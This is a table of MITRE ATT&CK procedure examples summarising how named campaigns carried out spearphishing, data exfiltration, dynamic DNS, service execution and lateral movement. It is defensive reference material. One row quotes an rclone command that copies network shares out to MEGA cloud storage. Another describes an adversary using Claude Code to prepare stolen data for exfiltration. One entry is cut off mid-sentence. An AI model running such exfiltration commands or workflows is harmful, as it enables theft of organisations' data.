Real-world descriptions of how a group, tool or campaign used a technique.
1146 examples
| Technique | Used by | Procedure example |
|---|---|---|
| T1566.001 Spearphishing Attachment |
CampaignOperation Spalax | During Operation Spalax, the threat actors sent phishing emails that included a PDF document that in some cases led to the download and execution of malware. |
| T1566.001 Spearphishing Attachment |
CampaignWater Curupira Pikabot Distribution | Water Curupira Pikabot Distribution attached password-protected ZIP archives to deliver Pikabot installers. |
| T1566.001 Spearphishing Attachment |
CampaignC0015 | For C0015, security researchers assessed the threat actors likely used a phishing campaign to distribute a weaponized attachment to victims. |
| T1566.001 Spearphishing Attachment |
CampaignOperation AkaiRyū | During Operation AkaiRyū, MirrorFace distributed crafted spearphishing emails containing malicious attachments. |
| T1566.001 Spearphishing Attachment |
CampaignC0011 | During C0011, Transparent Tribe sent malicious attachments via email to student targets in India. |
| T1566.002 Spearphishing Link |
CampaignOperation Dream Job | During Operation Dream Job, Lazarus Group sent malicious OneDrive links with fictitious job offer advertisements via email. |
| T1566.002 Spearphishing Link |
CampaignRedDelta Modified PlugX Infection Chain Operations | Mustang Panda distributed malicious links in phishing emails leading to HTML files that would direct the victim to malicious MSC files if running Windows based on User Agent fingerprinting during RedDelta Modified PlugX Infection Chain Operations. |
| T1566.002 Spearphishing Link |
CampaignOperation Dust Storm | During Operation Dust Storm, the threat actors sent spearphishing emails containing a malicious link. |
| T1566.002 Spearphishing Link |
CampaignOperation Spalax | During Operation Spalax, the threat actors sent phishing emails to victims that contained a malicious link. |
| T1566.002 Spearphishing Link |
CampaignC0021 | During C0021, the threat actors sent phishing emails with unique malicious links, likely for tracking victim clicks. |
| T1566.002 Spearphishing Link |
CampaignPikabot Distribution February 2024 | Pikabot Distribution February 2024 utilized emails with hyperlinks leading to malicious ZIP archive files containing scripts to download and install Pikabot. |
| T1566.002 Spearphishing Link |
CampaignOperation AkaiRyū | During Operation AkaiRyū, MirrorFace sent spearphishing emails with malicious OneDrive links. |
| T1566.002 Spearphishing Link |
CampaignNight Dragon | During Night Dragon, threat actors sent spearphishing emails containing links to compromised websites where malware was downloaded. |
| T1566.002 Spearphishing Link |
CampaignC0011 | During C0011, Transparent Tribe sent emails containing a malicious link to student targets in India. |
| T1566.003 Spearphishing via Service |
CampaignOperation Dream Job | During Operation Dream Job, Lazarus Group sent victims spearphishing messages via LinkedIn concerning fictitious jobs. |
| T1566.004 Spearphishing Voice |
CampaignC0027 | During C0027, Scattered Spider impersonated legitimate IT personnel in phone calls to direct victims to download a remote monitoring and management (RMM) tool that would allow the adversary to remotely control their system. |
| T1567 Exfiltration Over Web Service |
CampaignAnthropic AI-orchestrated Campaign | During the Anthropic AI-orchestrated Campaign, the adversary utilized Claude Code to generate a detailed summary report of collected data, which is then reviewed and approved by the adversary prior to exfiltration of data over Claude. |
| T1567 Exfiltration Over Web Service |
CampaignSalesforce Data Exfiltration | During Salesforce Data Exfiltration, threat actors exfiltrated data via legitimate Salesforce API communication channels including the Salesforce Data Loader application. |
| T1567 Exfiltration Over Web Service |
CampaignAPT28 Nearest Neighbor Campaign | During APT28 Nearest Neighbor Campaign, APT28 exfiltrated data over public-facing webservers – such as Google Drive. |
| T1567 Exfiltration Over Web Service |
CampaignC0017 | During C0017, APT41 used Cloudflare services for data exfiltration. |
| T1567.002 Exfiltration to Cloud Storage |
CampaignOperation Dream Job | During Operation Dream Job, Lazarus Group used a custom build of open-source command-line dbxcli to exfiltrate stolen data to Dropbox. |
| T1567.002 Exfiltration to Cloud Storage |
CampaignC0015 | During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command `rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M`. |
| T1567.002 Exfiltration to Cloud Storage |
CampaignAPT41 DUST | APT41 DUST exfiltrated collected information to OneDrive. |
| T1567.004 Exfiltration Over Webhook |
Campaign2025 Poland Wiper Attacks | During the 2025 Poland Wiper Attacks, the adversaries leveraged an attacker-controlled Slack channel to exfiltrate data. |
| T1568 Dynamic Resolution |
CampaignOperation Dust Storm | For Operation Dust Storm, the threat actors used dynamic DNS domains from a variety of free providers, including No-IP, Oray, and 3322. |
| T1568 Dynamic Resolution |
CampaignIndian Critical Infrastructure Intrusions | During Indian Critical Infrastructure Intrusions, RedEcho used dynamic DNS domains associated with malicious infrastructure. |
| T1568 Dynamic Resolution |
CampaignOperation Spalax | For Operation Spalax, the threat actors used dynamic DNS services, including Duck DNS and DNS Exit, as part of their C2 infrastructure. |
| T1568 Dynamic Resolution |
CampaignSolarWinds Compromise | During the SolarWinds Compromise, APT29 used dynamic DNS resolution to construct and resolve to randomly-generated subdomains for C2. |
| T1568 Dynamic Resolution |
CampaignNight Dragon | During Night Dragon, threat actors used dynamic DNS services for C2. |
| T1568 Dynamic Resolution |
CampaignC0026 | During C0026, the threat actors re-registered a ClouDNS dynamic DNS subdomain which was previously used by ANDROMEDA. |
| T1569.002 Service Execution |
CampaignSharePoint ToolShell Exploitation | During SharePoint ToolShell Exploitation, threat actors leveraged PsExec for command execution and used `services.exe` to disable Microsoft Defender via Registry keys. |
| T1569.002 Service Execution |
CampaignOperation Honeybee | During Operation Honeybee, threat actors ran |
| T1569.002 Service Execution |
CampaignOperation Digital Eye | During Operation Digital Eye, threat actors used the winsw tool to deploy a Visual Studio code executable as a Windows service. |
| T1569.002 Service Execution |
CampaignAPT41 DUST | APT41 DUST used Windows services to execute DUSTPAN. |
| T1569.002 Service Execution |
CampaignOperation Wocao | During Operation Wocao, threat actors created services on remote systems for execution purposes. |
| T1570 Lateral Tool Transfer |
CampaignSharePoint ToolShell Exploitation | During SharePoint ToolShell Exploitation, threat actors used Impacket to remotely stage and execute payloads via WMI. |
| T1570 Lateral Tool Transfer |
Campaign2015 Ukraine Electric Power Attack | During the 2015 Ukraine Electric Power Attack, Sandworm Team moved their tools laterally within the corporate network and between the ICS and corporate network. |
| T1570 Lateral Tool Transfer |
CampaignC0018 | During C0018, the threat actors transferred the SoftPerfect Network Scanner and other tools to machines in the network using AnyDesk and PDQ Deploy. |
| T1570 Lateral Tool Transfer |
CampaignC0015 | During C0015, the threat actors used WMI to load Cobalt Strike onto additional hosts within a compromised network. |
| T1570 Lateral Tool Transfer |
CampaignHomeLand Justice | During HomeLand Justice, threat actors initiated a process named Mellona.exe to spread the ROADSWEEP file encryptor and a persistence script to a list of internal machines. |
| T1570 Lateral Tool Transfer |
Campaign2025 Poland Wiper Attacks | During the 2025 Poland Wiper Attacks, the adversaries had placed the malicious payload on an accessible network share to facilitate propagation. |
| T1570 Lateral Tool Transfer |
Campaign2016 Ukraine Electric Power Attack | During the 2016 Ukraine Electric Power Attack, Sandworm Team used `move` to transfer files to a network share. |
| T1570 Lateral Tool Transfer |
CampaignOperation Wocao | During Operation Wocao, threat actors used SMB to copy files to and from target systems. |
| T1570 Lateral Tool Transfer |
Campaign2022 Ukraine Electric Power Attack | During the 2022 Ukraine Electric Power Attack, Sandworm Team used a Group Policy Object (GPO) to copy CaddyWiper's executable `msserver.exe` from a staging server to a local hard drive before deployment. |
| T1571 Non-Standard Port |
CampaignKV Botnet Activity | KV Botnet Activity generates a random port number greater than 30,000 to serve as the listener for subsequent command and control activity. |
| T1571 Non-Standard Port |
CampaignRedPenguin | During RedPenguin, UNC3886 used a backdoor that binds to port 45678 by default. |
| T1571 Non-Standard Port |
CampaignIndian Critical Infrastructure Intrusions | During Indian Critical Infrastructure Intrusions, RedEcho used non-standard ports such as TCP 8080 for HTTP communication. |
| T1571 Non-Standard Port |
CampaignC0018 | During C0018, the threat actors opened a variety of ports, including ports 28035, 32467, 41578, and 46892, to establish RDP connections. |
| T1571 Non-Standard Port |
CampaignC0032 | During the C0032 campaign, TEMP.Veles used port-protocol mismatches on ports such as 443, 4444, 8531, and 50501 during C2. |
| T1571 Non-Standard Port |
Campaign2025 Poland Wiper Attacks | During the 2025 Poland Wiper Attacks, the adversaries had created a Reverse SOCKS Proxy and communicated over the non-standard port 8008. |
Data from MITRE ATT&CK® (Enterprise). ATT&CK® is a registered trademark of The MITRE Corporation.